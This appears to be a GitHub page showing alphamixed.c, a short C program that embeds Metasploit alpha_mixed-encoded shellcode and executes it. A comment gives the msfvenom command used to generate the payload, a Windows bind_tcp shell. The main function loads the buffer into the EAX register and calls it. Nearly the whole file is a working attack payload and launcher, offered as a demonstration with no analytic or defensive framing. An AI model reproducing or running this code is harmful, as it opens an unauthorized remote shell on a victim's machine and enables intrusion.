-
Notifications
You must be signed in to change notification settings - Fork 30
/
Copy pathalphamixed.c
67 lines (63 loc) · 3.19 KB
/
alphamixed.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
/*
Filename: alphamixed.c
Author: Daniel Sauder
Website: http://govolution.wordpress.com
License http://creativecommons.org/licenses/by-sa/3.0/
Purpose: Demonstrate a shell binder for msf alpha_mixed encoded shellcode
compile: wine gcc -m32 -ffixed-eax alphamixed.c
*/
#include <stdio.h>
/*
msfvenom -a x86 --platform windows -p windows/shell/bind_tcp -e x86/alpha_mixed BufferRegister=EAX -f c
*/
unsigned char buf[] =
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x38\x68\x4c\x42\x75\x50"
"\x35\x50\x63\x30\x43\x50\x6c\x49\x49\x75\x56\x51\x79\x50\x43"
"\x54\x6e\x6b\x46\x30\x50\x30\x6e\x6b\x56\x32\x54\x4c\x4e\x6b"
"\x43\x62\x55\x44\x6e\x6b\x61\x62\x64\x68\x36\x6f\x4e\x57\x31"
"\x5a\x44\x66\x75\x61\x6b\x4f\x4c\x6c\x37\x4c\x30\x61\x71\x6c"
"\x53\x32\x36\x4c\x71\x30\x69\x51\x38\x4f\x54\x4d\x35\x51\x6f"
"\x37\x78\x62\x6b\x42\x56\x32\x61\x47\x6e\x6b\x32\x72\x44\x50"
"\x6e\x6b\x61\x5a\x55\x6c\x4e\x6b\x62\x6c\x77\x61\x30\x78\x48"
"\x63\x53\x78\x55\x51\x58\x51\x50\x51\x4c\x4b\x70\x59\x75\x70"
"\x55\x51\x5a\x73\x6c\x4b\x53\x79\x36\x78\x79\x73\x37\x4a\x50"
"\x49\x6e\x6b\x54\x74\x4c\x4b\x45\x51\x39\x46\x70\x31\x49\x6f"
"\x6e\x4c\x6f\x31\x48\x4f\x76\x6d\x36\x61\x6a\x67\x66\x58\x6d"
"\x30\x61\x65\x6c\x36\x73\x33\x51\x6d\x6a\x58\x57\x4b\x51\x6d"
"\x71\x34\x43\x45\x6b\x54\x56\x38\x4e\x6b\x53\x68\x66\x44\x53"
"\x31\x68\x53\x53\x56\x6c\x4b\x76\x6c\x32\x6b\x4e\x6b\x33\x68"
"\x57\x6c\x43\x31\x6b\x63\x4e\x6b\x54\x44\x6e\x6b\x46\x61\x7a"
"\x70\x4d\x59\x72\x64\x55\x74\x51\x34\x63\x6b\x73\x6b\x65\x31"
"\x42\x79\x62\x7a\x46\x31\x4b\x4f\x39\x70\x31\x4f\x43\x6f\x70"
"\x5a\x6e\x6b\x65\x42\x68\x6b\x4c\x4d\x73\x6d\x61\x78\x57\x43"
"\x66\x52\x75\x50\x47\x70\x42\x48\x33\x47\x42\x53\x46\x52\x43"
"\x6f\x76\x34\x43\x58\x30\x4c\x64\x37\x77\x56\x63\x37\x4b\x4f"
"\x59\x45\x68\x38\x6c\x50\x77\x71\x63\x30\x63\x30\x36\x49\x68"
"\x44\x30\x54\x70\x50\x70\x68\x65\x79\x4d\x50\x50\x6b\x35\x50"
"\x4b\x4f\x79\x45\x50\x6a\x64\x4b\x31\x49\x52\x70\x78\x62\x59"
"\x6d\x53\x5a\x67\x71\x51\x7a\x44\x42\x63\x58\x7a\x4a\x56\x6f"
"\x49\x4f\x79\x70\x6b\x4f\x58\x55\x6c\x57\x31\x78\x67\x72\x67"
"\x70\x74\x51\x71\x4c\x6d\x59\x68\x66\x32\x4a\x42\x30\x36\x36"
"\x70\x57\x51\x78\x4f\x32\x49\x4b\x30\x37\x72\x47\x79\x6f\x39"
"\x45\x6d\x55\x6f\x30\x71\x65\x36\x38\x33\x67\x51\x78\x48\x37"
"\x78\x69\x67\x48\x79\x6f\x69\x6f\x7a\x75\x52\x77\x72\x48\x51"
"\x64\x48\x6c\x47\x4b\x39\x71\x49\x6f\x4a\x75\x76\x37\x6c\x57"
"\x53\x58\x64\x35\x30\x6e\x30\x4d\x33\x51\x6b\x4f\x7a\x75\x42"
"\x4a\x47\x70\x52\x4a\x67\x74\x66\x36\x71\x47\x70\x68\x67\x72"
"\x68\x59\x79\x58\x53\x6f\x49\x6f\x4e\x35\x4d\x53\x79\x68\x57"
"\x70\x71\x6e\x64\x6d\x4e\x6b\x37\x46\x51\x7a\x47\x30\x63\x58"
"\x63\x30\x44\x50\x75\x50\x77\x70\x56\x36\x52\x4a\x37\x70\x50"
"\x68\x36\x38\x4c\x64\x71\x43\x4a\x45\x59\x6f\x6a\x75\x4f\x63"
"\x66\x33\x51\x7a\x63\x30\x56\x36\x52\x73\x56\x37\x32\x48\x67"
"\x72\x6a\x79\x5a\x68\x61\x4f\x79\x6f\x5a\x75\x4e\x63\x4b\x48"
"\x45\x50\x31\x6e\x75\x57\x33\x31\x6b\x73\x65\x79\x78\x46\x64"
"\x35\x69\x79\x38\x43\x41\x41";
int main(int argc, char **argv)
{
register unsigned char* r asm("eax");
r=buf;
asm("call *%eax;");
}